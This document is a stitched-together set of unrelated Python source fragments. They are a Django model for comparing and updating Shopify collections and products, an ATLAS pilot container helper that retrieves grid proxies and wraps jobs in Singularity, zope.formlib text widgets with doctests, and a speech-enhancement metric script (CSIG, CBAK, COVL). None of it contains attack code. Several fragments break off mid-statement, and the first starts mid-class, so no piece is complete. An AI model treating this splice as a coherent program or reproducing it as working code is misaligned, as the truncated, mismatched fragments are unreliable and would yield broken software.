# <editor-fold desc="result properties ...">
@property
def title_result(self):
choice_field = 'title_choice'
return getattr(self, getattr(self, choice_field))
title_result.fget.short_description = ''
@property
def metafields_result(self):
choice_field = 'metafields_choice'
return getattr(self, getattr(self, choice_field))
metafields_result.fget.short_description = ''
@property
def tags_result(self):
choice_field = 'tags_choice'
return getattr(self, getattr(self, choice_field))
tags_result.fget.short_description = ''
# </editor-fold>
# <editor-fold desc="result preview properties ...">
@property
def title_result_preview(self):
result_attr = 'title_result'
return getattr(self, result_attr)
@property
def metafields_result_preview(self):
result_attr = 'metafields_result'
values = getattr(self, result_attr)
if not values:
return None
return get_json_preview(json.dumps(values))
@property
def tags_result_preview(self):
result_attr = 'tags_result'
values = getattr(self, result_attr)
if not values:
return None
return get_json_preview(json.dumps(values))
# </editor-fold>
# <editor-fold desc="current properties ...">
@property
def title_current(self):
field = 'title'
return self.get_shopify_collection_attr_value(field)
title_current.fget.short_description = ''
@property
def metafields_current(self):
metafields = self.shopify_metafields
if not metafields:
return None
return sorted(
[
{
'namespace': metafield.namespace,
'key': metafield.key,
'owner_resource': metafield.owner_resource,
'value': metafield.value,
'value_type': metafield.value_type
}
for metafield in metafields
],
key=lambda k: k['value']
)
metafields_current.fget.short_description = ''
@property
def tags_current(self):
tags = self.shopify_tags
if not tags:
return None
return sorted(
[{'name': tag.name} for tag in tags],
key=lambda k: k['name']
)
tags_current.fget.short_description = ''
# </editor-fold>
# <editor-fold desc="current preview properties ...">
@property
def title_current_preview(self):
current_attr = 'title_current'
return getattr(self, current_attr)
@property
def metafields_current_preview(self):
current_attr = 'metafields_current'
values = getattr(self, current_attr)
if not values:
return None
return get_json_preview(json.dumps(values))
@property
def tags_current_preview(self):
current_attr = 'tags_current'
values = getattr(self, current_attr)
if not values:
return None
return get_json_preview(json.dumps(values))
# </editor-fold>
# <editor-fold desc="match properties ...">
def title_match(self):
current_attr = 'title_current'
result_attr = 'title_result'
current = getattr(self, current_attr)
result = getattr(self, result_attr)
if not result:
return None
return bool(current == result)
title_match.boolean = True
title_match.short_description = 'Title Match'
def metafields_match(self):
current_attr = 'metafields_current'
result_attr = 'metafields_result'
current = getattr(self, current_attr)
result = getattr(self, result_attr)
if not result:
return None
return bool(current == result)
metafields_match.boolean = True
metafields_match.short_description = 'Metafields Match'
def tags_match(self):
current_attr = 'tags_current'
result_attr = 'tags_result'
current = getattr(self, current_attr)
result = getattr(self, result_attr)
if not result:
return None
return bool(current == result)
tags_match.boolean = True
tags_match.short_description = 'Tags Match'
def full_match(self):
return bool(
self.title_match() is not False
and self.metafields_match() is not False
and self.tags_match() is not False
)
full_match.boolean = True
full_match.short_description = 'Calculator Match'
# </editor-fold>
# <editor-fold desc="difference properties ...">
@property
def title_difference(self):
current_preview_attr = 'title_current_preview'
result_preview_attr = 'title_result_preview'
match_attr = 'title_match'
if getattr(self, match_attr)() is not False:
return ''
current_preview = getattr(self, current_preview_attr)
result_preview = getattr(self, result_preview_attr)
return f'{current_preview} <- {result_preview}'
title_difference.fget.short_description = ''
@property
def metafields_difference(self):
current_attr = 'metafields_current'
result_attr = 'metafields_result'
match_attr = 'metafields_match'
if getattr(self, match_attr)() is not False:
return ''
current = getattr(self, current_attr)
result = getattr(self, result_attr)
return get_json_preview(
diff(
current,
result,
syntax='symmetric',
dump=True
)
)
metafields_difference.fget.short_description = ''
@property
def tags_difference(self):
current_attr = 'tags_current'
result_attr = 'tags_result'
match_attr = 'tags_match'
if getattr(self, match_attr)() is not False:
return ''
current = getattr(self, current_attr)
result = getattr(self, result_attr)
return get_json_preview(
diff(
current,
result,
syntax='symmetric',
dump=True
)
)
tags_difference.fget.short_description = ''
# </editor-fold>
# <editor-fold desc="perform properties ...">
def perform_calculated_fields_update(self):
collection = self.shopify_collection
try:
if self.title_match() is False:
collection.title = self.title_result
collection.save()
if self.metafields_match() is False:
metafields_result = self.metafields_result
for metafield_data in metafields_result:
defaults = {
'value': metafield_data.pop('value'),
'value_type': metafield_data.pop('value_type')
}
ShopifyMetafield.objects.update_or_create(
object_id=collection.pk,
content_type=ContentType.objects.get_for_model(collection),
**metafield_data,
defaults=defaults
)
# for metafield in self.shopify_metafields: # FIXME
# metafield_data = {
# 'namespace': metafield.namespace,
# 'key': metafield.key,
# 'owner_resource': metafield.owner_resource,
# 'value': metafield.value,
# 'value_type': metafield.value_type
# }
# if metafield_data not in metafields_result:
# metafield.delete()
if self.tags_match() is False:
tags_result = self.tags_result
for tag_data in tags_result:
tag, _ = ShopifyTag.objects.get_or_create(**tag_data)
collection.tags.add(tag)
collection.save()
for tag in self.shopify_tags:
tag_data = {'name': tag.name}
if tag_data not in tags_result:
collection.tags.remove(tag)
collection.save()
return collection.get_update_success_msg()
except Exception as err:
return self.get_instance_error_msg(str(err))
# </editor-fold>
objects = ShopifyCollectionCalculatorManager()
def __str__(self):
return str(self.collection)
class ShopifyProduct(Model, MessagesMixin):
APPAREL_TYPE = 'Apparel'
AUTOMOTIVE_TYPE = 'Automotive Parts'
PRODUCT_TYPE_CHOICES = [
(APPAREL_TYPE, APPAREL_TYPE),
(AUTOMOTIVE_TYPE, AUTOMOTIVE_TYPE)
]
WEB_SCOPE = 'web'
GLOBAL_SCOPE = 'global'
PUBLISHED_SCOPE_CHOICES = [
(WEB_SCOPE, WEB_SCOPE),
(GLOBAL_SCOPE, GLOBAL_SCOPE)
]
product_id = BigIntegerField(
blank=True,
help_text='Populated by Shopify',
null=True,
unique=True
)
title = CharField(
blank=True,
max_length=100
)
body_html = TextField(
blank=True,
verbose_name='body HTML'
)
vendor = ForeignKey(
ShopifyVendor,
blank=True,
null=True,
related_name='products',
on_delete=CASCADE
)
product_type = CharField(
choices=PRODUCT_TYPE_CHOICES,
default=AUTOMOTIVE_TYPE,
max_length=20
)
is_published = BooleanField(
default=False
)
published_scope = CharField(
choices=PUBLISHED_SCOPE_CHOICES,
default=WEB_SCOPE,
max_length=10
)
tags = ManyToManyField(
ShopifyTag,
blank=True,
related_name='products'
)
seo_title = CharField(
blank=True,
max_length=200
)
seo_description = TextField(
blank=True
)
metafields = GenericRelation(
ShopifyMetafield,
related_query_name='product'
)
# <editor-fold desc="count properties ...">
@property
def variant_count(self):
return self.variants.count()
variant_count.fget.short_description = 'variant count'
@property
def option_count(self):
return self.options.count()
option_count.fget.short_description = 'option count'
@property
def image_count(self):
return self.images.count()
image_count.fget.short_description = 'image count'
@property
def metafield_count(self):
return self.metafields.count()
metafield_count.fget.short_description = 'metafield count'
@property
def tag_count(self):
return self.tags.count()
tag_count.fget.short_description = 'tag count'
# </editor-fold>
# <editor-fold desc="error properties ...">
@property
def warnings(self):
"""
Returns a concatenation of warnings.
:return: warnings
:rtype: str
"""
msgs = []
return ', '.join(msgs)
@property
def errors(self):
"""
Returns a concatenation of errors.
:return: errors
:rtype: str
"""
msgs = []
if not | |
# pilot/user/atlas/container.py
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - <NAME>, <EMAIL>, 2017-2021
# - <NAME>, <EMAIL>, 2019-2020
import os
import pipes
import re
import logging
import traceback
# for user container test: import urllib
from pilot.common.errorcodes import ErrorCodes
from pilot.common.exception import PilotException, FileHandlingFailure
from pilot.user.atlas.setup import get_asetup, get_file_system_root_path
from pilot.user.atlas.proxy import verify_proxy
from pilot.info import InfoService, infosys
from pilot.util.config import config
from pilot.util.filehandling import write_file
from pilot.util import https
logger = logging.getLogger(__name__)
errors = ErrorCodes()
def get_payload_proxy(proxy_outfile_name, voms_role='atlas'):
"""
:param proxy_outfile_name: specify the file to store proxy
:param voms_role: what proxy (role) to request. It should exist on Panda node
:return: True on success
"""
try:
# it assumes that https_setup() was done already
url = os.environ.get('PANDA_SERVER_URL', config.Pilot.pandaserver)
res = https.request('{pandaserver}/server/panda/getProxy'.format(pandaserver=url), data={'role': voms_role})
if res is None:
logger.error("Unable to get proxy with role '%s' from panda server", voms_role)
return False
if res['StatusCode'] != 0:
logger.error("When get proxy with role '%s' panda server returned: %s", voms_role, res['errorDialog'])
return False
proxy_contents = res['userProxy']
except Exception as exc:
logger.error("Get proxy from panda server failed: %s, %s", exc, traceback.format_exc())
return False
res = False
try:
# pre-create an empty proxy file with secure permissions. Prepare it for write_file(), which cannot
# set the file permission mode itself and will write into the existing file with the correct permissions.
_file = os.open(proxy_outfile_name, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
os.close(_file)
res = write_file(proxy_outfile_name, proxy_contents, mute=False) # returns True on success
except (IOError, OSError, FileHandlingFailure) as exc:
logger.error("Exception when try to save proxy to the file '%s': %s, %s",
proxy_outfile_name, exc, traceback.format_exc())
return res
def do_use_container(**kwargs):
"""
Decide whether to use a container or not.
:param kwargs: dictionary of key-word arguments.
:return: True if function has decided that a container should be used, False otherwise (boolean).
"""
# to force no container use: return False
use_container = False
job = kwargs.get('job', False)
copytool = kwargs.get('copytool', False)
if job:
# for user jobs, TRF option --containerImage must have been used, ie imagename must be set
if job.imagename and job.imagename != 'NULL':
use_container = True
logger.debug('job.imagename set -> use_container = True')
elif not (job.platform or job.alrbuserplatform):
use_container = False
logger.debug('not (job.platform or job.alrbuserplatform) -> use_container = False')
else:
queuedata = job.infosys.queuedata
container_name = queuedata.container_type.get("pilot")
if container_name:
use_container = True
logger.debug('container_name == \'%s\' -> use_container = True', container_name)
else:
logger.debug('else -> use_container = False')
elif copytool:
# override for copytools - use a container for stage-in/out
use_container = True
logger.debug('copytool -> use_container = True')
else:
logger.debug('not job -> use_container = False')
return use_container
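# Call sketch (hypothetical variables; mirrors the two kwargs inspected above):
#   do_use_container(job=job)            # payload execution: image name / platform / queuedata decide
#   do_use_container(copytool=copytool)  # stage-in/out: a container is always preferred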
def wrapper(executable, **kwargs):
"""
Wrapper function for any container specific usage.
This function will be called by pilot.util.container.execute() and prepends the executable with a container command.
:param executable: command to be executed (string).
:param kwargs: dictionary of key-word arguments.
:return: executable wrapped with container command (string).
"""
workdir = kwargs.get('workdir', '.')
pilot_home = os.environ.get('PILOT_HOME', '')
job = kwargs.get('job', None)
logger.info('container wrapper called')
if workdir == '.' and pilot_home != '':
workdir = pilot_home
# if job.imagename (from --containerimage <image>) is set, then always use raw singularity
if config.Container.setup_type == "ALRB": # and job and not job.imagename:
fctn = alrb_wrapper
else:
fctn = singularity_wrapper
return fctn(executable, workdir, job=job)
def extract_platform_and_os(platform):
"""
Extract the platform and OS substring from platform
:param platform (string): E.g. "x86_64-slc6-gcc48-opt"
:return: extracted platform specifics (string). E.g. "x86_64-slc6". In case of failure, return the full platform
"""
pattern = r"([A-Za-z0-9_-]+)-.+-.+"
found = re.findall(re.compile(pattern), platform)
if found:
ret = found[0]
else:
logger.warning("could not extract architecture and OS substring using pattern=%s from platform=%s"
"(will use %s for image name)", pattern, platform, platform)
ret = platform
return ret
def get_grid_image_for_singularity(platform):
"""
Return the full path to the singularity grid image
:param platform: E.g. "x86_64-slc6" (string).
:return: full path to grid image (string).
"""
if not platform or platform == "":
platform = "x86_64-slc6"
logger.warning("using default platform=%s (cmtconfig not set)", platform)
arch_and_os = extract_platform_and_os(platform)
image = arch_and_os + ".img"
_path = os.path.join(get_file_system_root_path(), "atlas.cern.ch/repo/containers/images/singularity")
path = os.path.join(_path, image)
if not os.path.exists(path):
image = 'x86_64-centos7.img'
logger.warning('path does not exist: %s (trying with image %s instead)', path, image)
path = os.path.join(_path, image)
if not os.path.exists(path):
logger.warning('path does not exist either: %s', path)
path = ""
return path
def get_middleware_type():
"""
Return the middleware type from the container type.
E.g. container_type = 'singularity:pilot;docker:wrapper;container:middleware'
get_middleware_type() -> 'container', meaning that middleware should be taken from the container. The default
is otherwise 'workernode', i.e. middleware is assumed to be present on the worker node.
:return: middleware_type (string)
"""
middleware_type = ""
container_type = infosys.queuedata.container_type
middleware = 'middleware'
if container_type and container_type != "" and middleware in container_type:
try:
container_names = container_type.split(';')
for name in container_names:
_split = name.split(':')
if middleware == _split[0]:
middleware_type = _split[1]
except IndexError as exc:
logger.warning("failed to parse the container name: %s, %s", container_type, exc)
else:
# logger.warning("container middleware type not specified in queuedata")
# no middleware type was specified, assume that middleware is present on worker node
middleware_type = "workernode"
return middleware_type
def extract_atlas_setup(asetup, swrelease):
"""
Extract the asetup command from the full setup command for jobs that have a defined release.
export ATLAS_LOCAL_ROOT_BASE=/cvmfs/atlas.cern.ch/repo/ATLASLocalRootBase;
source ${ATLAS_LOCAL_ROOT_BASE}/user/atlasLocalSetup.sh --quiet;source $AtlasSetup/scripts/asetup.sh
-> $AtlasSetup/scripts/asetup.sh, export ATLAS_LOCAL_ROOT_BASE=/cvmfs/atlas.cern.ch/repo/ATLASLocalRootBase; source
${ATLAS_LOCAL_ROOT_BASE}/user/atlasLocalSetup.sh --quiet;
:param asetup: full asetup command (string).
:param swrelease: ATLAS release (string).
:return: extracted asetup command, cleaned up full asetup command without asetup.sh (string).
"""
if not swrelease:
return '', ''
try:
# source $AtlasSetup/scripts/asetup.sh
atlas_setup = asetup.split(';')[-1]
# export ATLAS_LOCAL_ROOT_BASE=/cvmfs/atlas.cern.ch/repo/ATLASLocalRootBase;
# source ${ATLAS_LOCAL_ROOT_BASE}/user/atlasLocalSetup.sh --quiet;
cleaned_atlas_setup = asetup.replace(atlas_setup, '')
atlas_setup = atlas_setup.replace('source ', '')
except AttributeError as exc:
logger.debug('exception caught while extracting asetup command: %s', exc)
atlas_setup = ''
cleaned_atlas_setup = ''
return atlas_setup, cleaned_atlas_setup
def extract_full_atlas_setup(cmd, atlas_setup):
"""
Extract the full asetup (including options) from the payload setup command.
atlas_setup is typically '$AtlasSetup/scripts/asetup.sh'.
:param cmd: full payload setup command (string).
:param atlas_setup: asetup command (string).
:return: extracted full asetup command, updated full payload setup command without asetup part (string).
"""
updated_cmds = []
extracted_asetup = ""
if not atlas_setup:
return extracted_asetup, cmd
try:
_cmd = cmd.split(';')
for subcmd in _cmd:
if atlas_setup in subcmd:
extracted_asetup = subcmd
else:
updated_cmds.append(subcmd)
updated_cmd = ';'.join(updated_cmds)
except AttributeError as exc:
logger.warning('exception caught while extracting full atlas setup: %s', exc)
updated_cmd = cmd
logger.debug('updated payload setup command: %s', updated_cmd)
return extracted_asetup, updated_cmd
def update_alrb_setup(cmd, use_release_setup):
"""
Update the ALRB setup command.
Add the ALRB_CONT_SETUPFILE in case the release setup file was created earlier (requires cvmfs to be available).
:param cmd: full ALRB setup command (string).
:param use_release_setup: should the release setup file be added to the setup command? (Boolean).
:return: updated ALRB setup command (string).
"""
updated_cmds = []
try:
_cmd = cmd.split(';')
for subcmd in _cmd:
if subcmd.startswith('source ${ATLAS_LOCAL_ROOT_BASE}') and use_release_setup:
updated_cmds.append('export ALRB_CONT_SETUPFILE="/srv/%s"' % config.Container.release_setup)
updated_cmds.append(subcmd)
updated_cmd = ';'.join(updated_cmds)
except AttributeError as exc:
logger.warning('exception caught while updating ALRB setup command: %s', exc)
updated_cmd = cmd
logger.debug('updated ALRB command: %s', updated_cmd)
return updated_cmd
def update_for_user_proxy(_cmd, cmd, is_analysis=False):
"""
Add the X509 user proxy to the container sub command string if set, and remove it from the main container command.
Try to receive payload proxy and update X509_USER_PROXY in the container setup command.
In case payload proxy from server is required, this function will also download and verify this proxy.
:param _cmd: container setup command (string).
:param cmd: command the container will execute (string).
:param is_analysis: True for user job (Boolean).
:return: exit_code (int), diagnostics (string), updated _cmd (string), updated cmd (string).
"""
exit_code = 0
diagnostics = ""
x509 = os.environ.get('X509_USER_PROXY', '')
if x509 != "":
# do not include the X509_USER_PROXY in the command the container will execute
cmd = cmd.replace("export X509_USER_PROXY=%s;" % x509, '')
# add it instead to the container setup command:
# download and verify payload proxy from the server if desired
proxy_verification = os.environ.get('PILOT_PROXY_VERIFICATION') == 'True' and os.environ.get('PILOT_PAYLOAD_PROXY_VERIFICATION') == 'True'
if proxy_verification and config.Pilot.payload_proxy_from_server and is_analysis:
exit_code, diagnostics, x509 = get_and_verify_payload_proxy_from_server(x509)
if exit_code | |
##############################################################################
#
# Copyright (c) 2004 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Browser widgets with text-based input
"""
import decimal
from xml.sax import saxutils
from zope.interface import implementer
from zope.datetime import parseDatetimetz
from zope.datetime import DateTimeError
from zope.i18n.format import DateTimeParseError
from zope.formlib._compat import toUnicode, unicode, PY3
from zope.formlib.interfaces import ConversionError
from zope.formlib.i18n import _
from zope.formlib.interfaces import ITextBrowserWidget
from zope.formlib.widget import SimpleInputWidget, renderElement
from zope.formlib.widget import DisplayWidget
def escape(str):
if str is not None:
str = saxutils.escape(str)
return str
@implementer(ITextBrowserWidget)
class TextWidget(SimpleInputWidget):
"""Text widget.
Single-line text (unicode) input
>>> from zope.publisher.browser import TestRequest
>>> from zope.schema import TextLine
>>> field = TextLine(__name__='foo', title=u'on')
>>> request = TestRequest(form={'field.foo': u'Bob'})
>>> widget = TextWidget(field, request)
>>> widget.hasInput()
True
>>> widget.getInputValue()
u'Bob'
>>> def normalize(s):
... return '\\n '.join(filter(None, s.split(' ')))
>>> print(normalize( widget() ))
<input
class="textType"
id="field.foo"
name="field.foo"
size="20"
type="text"
value="Bob"
/>
>>> print(normalize( widget.hidden() ))
<input
class="hiddenType"
id="field.foo"
name="field.foo"
type="hidden"
value="Bob"
/>
Calling `setRenderedValue` will change what gets output:
>>> widget.setRenderedValue("Barry")
>>> print(normalize( widget() ))
<input
class="textType"
id="field.foo"
name="field.foo"
size="20"
type="text"
value="Barry"
/>
Check that HTML is correctly encoded and decoded:
>>> request = TestRequest(
... form={'field.foo': u'<h1>©</h1>'})
>>> widget = TextWidget(field, request)
>>> widget.getInputValue()
u'<h1>©</h1>'
>>> print(normalize( widget() ))
<input
class="textType"
id="field.foo"
name="field.foo"
size="20"
type="text"
value="<h1>&copy;</h1>"
/>
"""
default = ''
displayWidth = 20
displayMaxWidth = ""
extra = ''
style = ''
convert_missing_value = True
def __init__(self, *args):
super(TextWidget, self).__init__(*args)
def __call__(self):
value = self._getFormValue()
if value is None or value == self.context.missing_value:
value = ''
kwargs = {'type': self.type,
'name': self.name,
'id': self.name,
'value': value,
'cssClass': self.cssClass,
'style': self.style,
'size': self.displayWidth,
'extra': self.extra}
if self.displayMaxWidth:
# TODO This is untested.
kwargs['maxlength'] = self.displayMaxWidth
return renderElement(self.tag, **kwargs)
def _toFieldValue(self, input):
if self.convert_missing_value and input == self._missing:
value = self.context.missing_value
else:
# We convert everything to unicode. This might seem a bit crude,
# but anything contained in a TextWidget should be representable
# as a string. Note that you always have the choice of overriding
# the method.
try:
value = toUnicode(input)
except ValueError as v:
raise ConversionError(_("Invalid text data"), v)
return value
class Text(SimpleInputWidget):
def _toFieldValue(self, input):
return super(Text, self)._toFieldValue(input)
class Bytes(SimpleInputWidget):
def _toFieldValue(self, input):
value = super(Bytes, self)._toFieldValue(input)
if isinstance(value, unicode):
try:
value = value.encode('ascii')
except UnicodeError as v:
raise ConversionError(_("Invalid textual data"), v)
return value
class BytesWidget(Bytes, TextWidget):
"""Bytes widget.
Single-line data (string) input
>>> from zope.publisher.browser import TestRequest
>>> from zope.schema import BytesLine
>>> field = BytesLine(__name__='foo', title=u'on')
>>> request = TestRequest(form={'field.foo': u'Bob'})
>>> widget = BytesWidget(field, request)
>>> widget.hasInput()
True
>>> widget.getInputValue()
'Bob'
"""
class BytesDisplayWidget(DisplayWidget):
"""Bytes display widget"""
def __call__(self):
if self._renderedValueSet():
content = self._data
else:
content = self.context.default
return renderElement("pre", contents=escape(content))
# for things which are of the str type on both Python 2 and 3
if PY3: # pragma NO COVER
NativeString = Text
NativeStringWidget = TextWidget
NativeStringDisplayWidget = DisplayWidget
else: # pragma NO COVER
NativeString = Bytes
NativeStringWidget = BytesWidget
NativeStringDisplayWidget = BytesDisplayWidget
class ASCII(NativeString):
"""ASCII"""
class ASCIIWidget(NativeStringWidget):
"""ASCII widget.
Single-line data (string) input
"""
class ASCIIDisplayWidget(NativeStringDisplayWidget):
"""ASCII display widget"""
class URIDisplayWidget(DisplayWidget):
"""URI display widget.
:ivar linkTarget:
The value of the ``target`` attribute for the generated hyperlink.
If this is not set, no ``target`` attribute is generated.
"""
linkTarget = None
def __call__(self):
if self._renderedValueSet():
content = self._data
else:
content = self.context.default
if not content:
# If there is no content it is not useful to render an anchor.
return ''
content = escape(content)
kw = dict(contents=content, href=content)
if self.linkTarget:
kw["target"] = self.linkTarget
return renderElement("a", **kw)
class TextAreaWidget(SimpleInputWidget):
"""TextArea widget.
Multi-line text (unicode) input.
>>> from zope.publisher.browser import TestRequest
>>> from zope.schema import Text
>>> field = Text(__name__='foo', title=u'on')
>>> request = TestRequest(form={'field.foo': u'Hello\\r\\nworld!'})
>>> widget = TextAreaWidget(field, request)
>>> widget.hasInput()
True
>>> widget.getInputValue()
u'Hello\\nworld!'
>>> def normalize(s):
... return '\\n '.join(filter(None, s.split(' ')))
>>> print(normalize( widget() ))
<textarea
cols="60"
id="field.foo"
name="field.foo"
rows="15"
>Hello\r
world!</textarea>
>>> print(normalize( widget.hidden() ))
<input
class="hiddenType"
id="field.foo"
name="field.foo"
type="hidden"
value="Hello world!"
/>
Calling `setRenderedValue` will change what gets output:
>>> widget.setRenderedValue("Hey\\ndude!")
>>> print(normalize( widget() ))
<textarea
cols="60"
id="field.foo"
name="field.foo"
rows="15"
>Hey\r
dude!</textarea>
Check that HTML is correctly encoded and decoded:
>>> request = TestRequest(
... form={'field.foo': u'<h1>©</h1>'})
>>> widget = TextAreaWidget(field, request)
>>> widget.getInputValue()
u'<h1>©</h1>'
>>> print(normalize( widget() ))
<textarea
cols="60"
id="field.foo"
name="field.foo"
rows="15"
><h1>&copy;</h1></textarea>
There was a bug which caused the content of <textarea> tags not to be
rendered correctly when there was a conversion error. Make sure the quoting
works correctly::
>>> from zope.schema import Text
>>> field = Text(__name__='description', title=u'Description')
>>> from zope.formlib.interfaces import ConversionError
>>> class TestTextAreaWidget(TextAreaWidget):
... def _toFieldValue(self, input):
... if 'foo' in input:
... raise ConversionError("I don't like foo.")
... return input
...
>>> request = TestRequest(form={'field.description': u'<p>bar</p>'})
>>> widget = TestTextAreaWidget(field, request)
>>> widget.getInputValue()
u'<p>bar</p>'
>>> print(normalize( widget() ))
<textarea
cols="60"
id="field.description"
name="field.description"
rows="15"
><p>bar</p></textarea>
>>> request = TestRequest(form={'field.description': u'<p>foo</p>'})
>>> widget = TestTextAreaWidget(field, request)
>>> try:
... widget.getInputValue()
... except ConversionError as error:
... print(error.doc())
I don't like foo.
>>> print(normalize( widget() ))
<textarea
cols="60"
id="field.description"
name="field.description"
rows="15"
><p>foo</p></textarea>
"""
default = ""
width = 60
height = 15
extra = ""
style = ''
def _toFieldValue(self, value):
value = super(TextAreaWidget, self)._toFieldValue(value)
if value:
try:
value = toUnicode(value)
except ValueError as v:
raise ConversionError(_("Invalid unicode data"), v)
else:
value = value.replace("\r\n", "\n")
return value
def _toFormValue(self, value):
value = super(TextAreaWidget, self)._toFormValue(value)
if value:
value = value.replace("\n", "\r\n")
else:
value = u''
return value
def __call__(self):
return renderElement("textarea",
name=self.name,
id=self.name,
cssClass=self.cssClass,
rows=self.height,
cols=self.width,
style=self.style,
contents=escape(self._getFormValue()),
extra=self.extra)
class BytesAreaWidget(Bytes, TextAreaWidget):
"""BytesArea widget.
Multi-line string input.
>>> from zope.publisher.browser import TestRequest
>>> from zope.schema import Bytes
>>> field = Bytes(__name__='foo', title=u'on')
>>> request = TestRequest(form={'field.foo': u'Hello\\r\\nworld!'})
>>> widget = BytesAreaWidget(field, request)
>>> widget.hasInput()
True
>>> widget.getInputValue()
'Hello\\nworld!'
"""
class ASCIIAreaWidget(NativeString, TextAreaWidget):
"""ASCIIArea widget.
Multi-line string input.
>>> from zope.publisher.browser import TestRequest
>>> from zope.schema import ASCII
>>> field = ASCII(__name__='foo', title=u'on')
>>> request = TestRequest(form={'field.foo': u'Hello\\r\\nworld!'})
>>> widget = ASCIIAreaWidget(field, request)
>>> widget.hasInput()
True
>>> widget.getInputValue()
'Hello\\nworld!'
"""
class PasswordWidget(TextWidget):
"""Password Widget"""
type = 'password'
def __call__(self):
displayMaxWidth = self.displayMaxWidth or 0
if displayMaxWidth > 0:
return renderElement(self.tag,
type=self.type,
name=self.name,
id=self.name,
value='',
cssClass=self.cssClass,
style=self.style,
size=self.displayWidth,
maxlength=displayMaxWidth,
extra=self.extra)
else:
return renderElement(self.tag,
type=self.type,
name=self.name,
id=self.name,
value='',
cssClass=self.cssClass,
style=self.style,
size=self.displayWidth,
extra=self.extra)
def _toFieldValue(self, input):
try:
existing = self.context.get(self.context.context)
except AttributeError:
existing = False
if (not input) and existing:
return self.context.UNCHANGED_PASSWORD
return super(PasswordWidget, self)._toFieldValue(input)
def hidden(self):
raise NotImplementedError(
'Cannot get a hidden tag for a password field')
class FileWidget(TextWidget):
"""File Widget"""
type = 'file'
def __call__(self):
displayMaxWidth = self.displayMaxWidth or 0
hidden = renderElement(self.tag,
type='hidden',
name=self.name + ".used",
id=self.name + ".used",
value="")
if displayMaxWidth > 0:
elem = renderElement(self.tag,
type=self.type,
name=self.name,
id=self.name,
cssClass=self.cssClass,
size=self.displayWidth,
maxlength=displayMaxWidth,
extra=self.extra)
else:
elem = renderElement(self.tag,
type=self.type,
name=self.name,
id=self.name,
cssClass=self.cssClass,
size=self.displayWidth,
extra=self.extra)
return "%s %s" % (hidden, elem)
def _toFieldValue(self, input):
if input is None or input == '':
return self.context.missing_value
try:
seek = input.seek
read = input.read
except AttributeError as e:
raise ConversionError(_('Form input is not a file object'), e)
else:
seek(0)
data = read()
if data or getattr(input, 'filename', ''):
return data
else:
return self.context.missing_value
def hasInput(self):
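# The hidden "<name>.used" input rendered by __call__() marks that the widget was
# present in the form, so hasInput() is true even when no file was chosen.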
return ((self.name + ".used" in self.request.form)
or
(self.name in self.request.form)
)
class IntWidget(TextWidget):
"""Integer number widget.
Let's make sure that zeroes are rendered properly:
>>> from zope.schema import Int
>>> field = Int(__name__='foo', title=u'on')
>>> widget = IntWidget(field, None)
>>> widget.setRenderedValue(0)
>>> 'value="0"' in widget()
True
"""
displayWidth = 10
def _toFieldValue(self, input):
if input == self._missing:
return self.context.missing_value
else:
try:
return int(input)
except ValueError as v:
raise ConversionError(_("Invalid integer data"), v)
class FloatWidget(TextWidget):
displayWidth = 10
def _toFieldValue(self, input):
if input == self._missing:
return self.context.missing_value
else:
try:
return float(input)
except ValueError as v:
raise ConversionError(_("Invalid floating point | |
# This script is used to compute CSIG, CBAK and COVL,
# and it is from https://github.com/facebookresearch/denoiser/blob/main/scripts/matlab_eval.py
from scipy.linalg import toeplitz
from tqdm import tqdm
from pesq import pesq
import librosa
import numpy as np
import os
import sys
def eval_composite(ref_wav, deg_wav):
ref_wav = ref_wav.reshape(-1)
deg_wav = deg_wav.reshape(-1)
alpha = 0.95
len_ = min(ref_wav.shape[0], deg_wav.shape[0])
ref_wav = ref_wav[:len_]
ref_len = ref_wav.shape[0]
deg_wav = deg_wav[:len_]
# Compute WSS measure
wss_dist_vec = wss(ref_wav, deg_wav, 16000)
wss_dist_vec = sorted(wss_dist_vec, reverse=False)
wss_dist = np.mean(wss_dist_vec[:int(round(len(wss_dist_vec) * alpha))])
# Compute LLR measure
LLR_dist = llr(ref_wav, deg_wav, 16000)
LLR_dist = sorted(LLR_dist, reverse=False)
LLRs = LLR_dist
LLR_len = round(len(LLR_dist) * alpha)
llr_mean = np.mean(LLRs[:LLR_len])
# Compute the SSNR
snr_mean, segsnr_mean = SSNR(ref_wav, deg_wav, 16000)
segSNR = np.mean(segsnr_mean)
# Compute the PESQ
pesq_raw = PESQ(ref_wav, deg_wav)
Csig = 3.093 - 1.029 * llr_mean + 0.603 * pesq_raw - 0.009 * wss_dist
Csig = trim_mos(Csig)
Cbak = 1.634 + 0.478 * pesq_raw - 0.007 * wss_dist + 0.063 * segSNR
Cbak = trim_mos(Cbak)
Covl = 1.594 + 0.805 * pesq_raw - 0.512 * llr_mean - 0.007 * wss_dist
Covl = trim_mos(Covl)
return {'csig':Csig, 'cbak':Cbak, 'covl':Covl}
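# Usage sketch (hypothetical file names; both signals must be 16 kHz to match the
# rate hard-coded in PESQ/wss/SSNR below):
#   ref, _ = librosa.load('clean.wav', sr=16000)
#   deg, _ = librosa.load('enhanced.wav', sr=16000)
#   scores = eval_composite(ref, deg)  # -> {'csig': ..., 'cbak': ..., 'covl': ...}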
# ----------------------------- HELPERS ------------------------------------ #
def trim_mos(val):
return min(max(val, 1), 5)
def lpcoeff(speech_frame, model_order):
# (1) Compute Autocor lags
winlength = speech_frame.shape[0]
R = []
for k in range(model_order + 1):
first = speech_frame[:(winlength - k)]
second = speech_frame[k:winlength]
R.append(np.sum(first * second))
# (2) Lev-Durbin
a = np.ones((model_order,))
E = np.zeros((model_order + 1,))
rcoeff = np.zeros((model_order,))
E[0] = R[0]
for i in range(model_order):
if i == 0:
sum_term = 0
else:
a_past = a[:i]
sum_term = np.sum(a_past * np.array(R[i:0:-1]))
rcoeff[i] = (R[i+1] - sum_term)/E[i]
a[i] = rcoeff[i]
if i > 0:
